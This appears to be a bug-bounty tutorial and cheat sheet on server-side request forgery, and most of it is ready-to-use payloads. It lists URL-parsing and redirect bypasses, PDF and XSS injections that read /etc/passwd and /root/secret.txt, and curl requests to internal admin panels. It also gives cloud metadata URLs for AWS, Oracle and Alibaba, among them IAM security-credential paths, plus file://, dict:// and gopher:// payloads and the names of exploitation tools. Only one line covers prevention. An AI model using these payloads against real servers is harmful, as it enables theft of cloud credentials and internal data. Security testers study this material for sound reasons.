Server-Side Request Forgery, SSRF
Server-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behaviour of a server making a request that’s under the attacker’s control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.
In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organisations infrastructure, or to external third-party systems.
What are types of SSRF.
· Blind SSRF — occurs when you never get any information about a target service from the initial request
· Semi Blind SSRF
· Non-Blind SSRF
What is the impact of SSRF attacks?
A successful SSRF attack can often result in
· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.
· Scan Local or External Networks.
· Read Files from the Server & Internal Resources
· SSRF to Reflected XSS
· Can fetch the metadata of the servers.
Preventing Server Side Request Forgery (SSRF)
To prevent SSRF vulnerabilities in web applications it is strongly advised to use a white-listings of allowed domains and protocols from where the web server can fetch remote resources.
When you have to try for SSRF?
1. If you got Open Redirect try escalating it to SSRF.
2. SSRF to grep parameters may vulnerable to SSRF.
3. SSRF’s are more in API’s so crawl the whole web app with burp proxy turned on and search for keywords like., eg : ?url= , ?uri= , ?req=
4. Sign up with an Email like attacker.collaborator.net. If u receive HTTP req. in collaborator then its SSRF. But if there’s no impact don’t report it, DNS and SMTP request doesn’t matters.
5. Try to find Blind SSRF on hidden parameter
6. Try Blind SSRF on referer header
How we can Perform a SSRF attack to a target application?
Some of the payloads for SSRF
URL based bypasses:
http://google.com:80+&@127.88.23.245:22/#+@google.com:80/
http://127.88.23.245:22/+&@google.com:80#+@google.com:80/
http://google.com:80+&@google.com:80#+@127.88.23.245:22/
http://127.88.23.245:22/?@google.com:80/
Bypassing using a redirect
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
2. Launch the SSRF pointing to http://vulnerable.com/index.php?url=http://YOUR_SERVER_IP will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
Bypassing using type=url
Change “type=file” to “type=url”
Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
SSRF exploiting PDF file
<link rel=attachment href=”file:///root/secret.txt”>
SSRF from XSS
The content of the file will be integrated inside the PDF as an image or text.
<img src=”echopwn” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/>
SSRF from CURL
curl http://targetwebsite.com:4567/\?url\=http://10.0.0.2/
It will give something like
RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>
SSRF from Referrer
GET /HTTP 1.1
Host: Targetwebsite.com
User Agent: Firefox
Referrer: https://your_collaborator_instance.com
SSRF from File-upload — redirect test for various cases
Status codes: 300, 301, 302, 303, 305, 307, 308
Filetypes: jpg, json, csv, xml, pdf
JPG 301 response without and with a valid response body:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
JSON 301 response without and with a valid response body:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
CSV 301 response without and with a valid response body:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
XML 301 response without and with a valid response body:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
pdf 301 response without and with a valid response body:
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf
AWS:
1. AWS localhost is 169.254.169.254 so don’t use 127.0.0.1 there!
2. If you find any SSRF vulnerability that runs on EC2, try requesting :
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
SSRF URL for Oracle Cloud
http://192.0.0.192/latest/user-data/
SSRF URL for Alibaba
http://100.100.100.200/latest/meta-data/
Few more Random Payloads that might be helpful in finding SSRF vulnerability.
Use the below payloads in the body of the request
GET /?url=http://google.com/ HTTP/1.1
Host: example.comGET /?url=http://localhost/server-status HTTP/1.1
GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
GET /?url=dict://localhost:11211/stat
GET /?url=file:///etc/passwd
file:///, dict://, ftp:// gopher:// keywords
http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini
{“userId”: “1”, “url”: “http://127.0.1:513/"}
{“userId”: “1”, “url”: “http://127.0.0.1:513/"}
Some of the tools that can be used for SSRF
· SSRFmap — https://github.com/swisskyrepo/SSRFmap
· Gopherus — https://github.com/tarunkant/Gopherus
· See-SURF — https://github.com/In3tinct/See-SURF
· SSRF Sheriff — https://github.com/teknogeek/ssrf-sheriff
